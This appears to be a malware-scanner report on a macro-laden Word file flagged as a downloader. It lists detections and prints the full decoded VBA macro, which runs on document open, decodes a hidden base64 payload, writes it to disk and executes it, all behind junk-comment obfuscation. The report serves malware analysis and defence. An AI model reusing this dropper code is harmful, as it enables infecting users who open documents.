MALICIOUS
190
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim a1vpJ As New Shell32.Shell -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7209 bytes |
SHA-256: 794f9cb4fbbb0931335b09381f1c440b279c9a61ce3bc5afc2746b48161a7259 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{E8007AA5-D8B6-4DEE-994A-BEC63BFC3B78}{7ED54160-90E2-43CF-A46A-27240F12F562}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aGMWN"
Sub AutoOpen()
' Inspector breast catechism train
' Figuratively cold-blooded norfolk
' Mishap scrawl desire modifies
' Comp enhancement dawn computation
Call agcqY
End Sub
Sub agcqY()
a809ck
End Sub
Function acTBWM(agmxX)
awlSC = ""
For aKdaJ = Len(agmxX) To 1 Step -1
awlSC = awlSC & "" & Mid(agmxX, aKdaJ, 1)
Next aKdaJ
acTBWM = awlSC
End Function
Function aQZVL0(b64)
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64"
.text = b64
b = .nodeTypedValue
End With
aQZVL0 = StrConv(b, vbUnicode)
End Function
Attribute VB_Name = "aoCiD"
Sub ajQmo(abjFx, aA7EIT)
' Milfs illogical fez tatiana
' Dessert forceful
' Imputation
Set aEY0Xk = CreateObject("Scripting.FileSystemObject")
Call aEY0Xk.CopyFile(abjFx, aA7EIT, 1)
' Goth. eighty-seven idiom
End Sub
Sub aygmWQ(anpEI, a1037)
' Requires pun dorsal
' Unlikely leslie sides
' Installations beyond dishevelled brent cleavage
' Hooked
' Adolescent underlie untamed design
' Storied ethical
' Reflection democrat
' Thirty-seven aggregation relevant palliate
' Instruments evolutionary climbing scape
' Bellows practitioner flights
' Statistical forever lord valentine
' Beehive numbness amalgamation
' Civilian citizenship wildness rca choose
' Vb executives envelop
' Wake dynamo
' Canto trinity unapproachable
' Meritorious cumulative
' Officer dipper
' Gaol
' Citizenship welter easel annuity
' Butchers self-evident medicare
' Workshops shoes nw joshua
' Efficient future
' Browser ducking
' Leave conf univ
' Graphics elector studying cascade browse
' Fakir trustee ares
' Latest
Open anpEI For Output As #1
Print #1, a1037
' Dot insufferable criticized
' Blizzard
' Hopping archaic stands
Close #1
End Sub
Attribute VB_Name = "aaepO"
Function aYGFv(a5KDjy)
' Dwelling-place
' Menu adept lending
' Verona flawless winded
' Artemis foolhardy
' Mitre
' Lucrative paragraphs aircraft
' Scythe prank should eth plays
' Conch valid wold nodes maze crier professor
' Poison elongated washing
' Prehistoric dredge hosea bridesmaid
' Legendary tiara
' Consequently nausea testimony pallet briton luxury corresponding
' Maw fodder prophesy familiar
End Function
Function abZIO(aHR3AT)
' Winner bruno src
' Tucson gasoline nods snail
' Histrionic
' Hike swoop ancient pdf poland
' Insects hash intolerant lease abeyance stuck
' Dram tell crested prospective cherubim
' Portraits vegetable brunswick undeniable monetary
' Mb
' Sms reprieve selecting
' Flame slave all-powerful
' Painting visor
' Easy
' Idiomatic probably heavy
' Devious rising
' Modem affably ogre como crescent
' Constructed img
akFc7 = Split(acTBWM(frm.paths.text), "|")
Select Case aHR3AT
Case Is = 0
abZIO = akFc7(0)
Case Is = 1
abZIO = akFc7(1)
Case Is = 2
abZIO = akFc7(2)
Case Is = 3
abZIO = akFc7(3)
End Select
' Reflected elegantly uplifting invalid predilection
' Aptitude presidential diffusion margaret
' Skirted proof
' Prices packages springer
' Positions would-be opinion flashlight
' Counties toronto newcomer
' Smuggle geo
' Malt perceived confronting sperm gm liberia
' Frontier scientist
' Babyhood lebanon snowdon ores
' Movers yugoslavia
' Half wraith
' Estonia hip israeli
' Primarily sheriff upon pichunter outlets
' Primordial board
' Railway
' Ottoman bt
' Sundown generate
' Utility miami studied increased
' Yield regards
End Function
Function apxBH(a7kmS, arGibm)
' Tacit ravenous grants reality
' Stringent reef por
' Addition converge ports
' Indicator
' Roy tomorrow espionage sexton trieste correctly indignity
' Bahamas
' Priestcraft trainer purport
' Dioxide standard privacy confronts
' Necessitate infrastructure cycles interaction
' Lane
' Stress making adding encyclopedia
End Function
Sub a809ck()
a4dcKY = abZIO(0)
a51tY = abZIO(1)
aryKE = abZIO(2)
avQJuo = abZIO(3)
' Penal cherry
' Caucasian born
' Hundredth tasteless seafaring
' Impecunious always christopher dd
' Sis caribbean
' Tack ozone jersey
' Superannuated unmarked fief contraction
' Sharp interaction
' Kentucky citizenship leisure basement distended abasement
' Teaching deft
' Damped
' Abdullah decrease updated
' Pound execration sensuous
' Peripherals estrangement amplitude awesome torpedo
' Control detective foxes chaos similar creditor
' Postscript governance elocution satyr
' Zu providing automobile legitimacy
' Adroit sonny data bruges
' Exemption press economics calculator chromatic macedonians tuning
' Pipe denied conch convertible
auOzx = acTBWM(aQZVL0(frm.pay.text))
' Liquids inspector karma
aygmWQ a4dcKY, auOzx
' Sticky retail joseph allegory
' Complement portmanteau elegantly oceans
' Unwound tuner threatened
' Abe
' Soft just fluffy denomination urania
' Coasting galvanometer calendars
' Redder geek purl
' Fault rings honda determined
' Apache expanding cooperative maldives
' Ne facilitate
ajQmo aryKE, a51tY
' Miami
' Earliest penal southwark benign discovers
' Hygiene
' Journal intruder equivalent slighted
' Regularly poetry
' Zee dallas diamond bhutan undercurrent
' Indubitably intermittent sms shoemaker consumes convocation awards
' Zulus nassau intensive rome tag
' Caucus jaunt
' Alfred trailers
' Exuberance mallet loathing assimilating
' Get pertain sentient
' Essex intent graduate
' Staffs examiner fiji pard
' Vascular thumping causing
' Ease ill. chaotic
' Fujitsu weakling ppc
' Thinks cumshot rome operated worlds hammock
' Instant wave
' Apartment cashier
' Auto ct benz
aWJPF = Chr(34)
a8WFp7 = Trim(avQJuo & "t : " & aWJPF & a4dcKY & aWJPF)
' Pollution obviously
' Section playground nowhere
' Quietude trains billing
' Roger brawl mince
' Examines veldt inconsistency
Dim a1vpJ As New Shell32.Shell
Call a1vpJ.ShellExecute(a51tY, a8WFp7, " ", SW_SHOWNORMAL)
' Dos licking mar tribune category
' Andrews languorous
' Guano compendium mickle lancashire
' Love-making frankfurt
' Deemed electrode titten inefficient potash
' Aw mohawk complete bungalow cyprus
' Involving Word aquarium functioning tracks
' Ile scald
' Threesome
' Bra hips housewares animates exeter
' Seal decor subjects diy aviation keyboard
' Freehold butterfly do
' Depreciation artificial unicameral finnish
' Websites carnage statistical outstanding
' Adele
' Static migrate
' Identifying
' Surround languidly poppy asset
' Ark. rummage
' Savory foregone fealty disks cod
' Practice cramp
' Shewn debut trustees democracy mortality
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 39424 bytes |
SHA-256: 36dae3d0de9882f57704d2e9e1f205aa4208cc801c4e72868e4d73ab2b4044b6 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.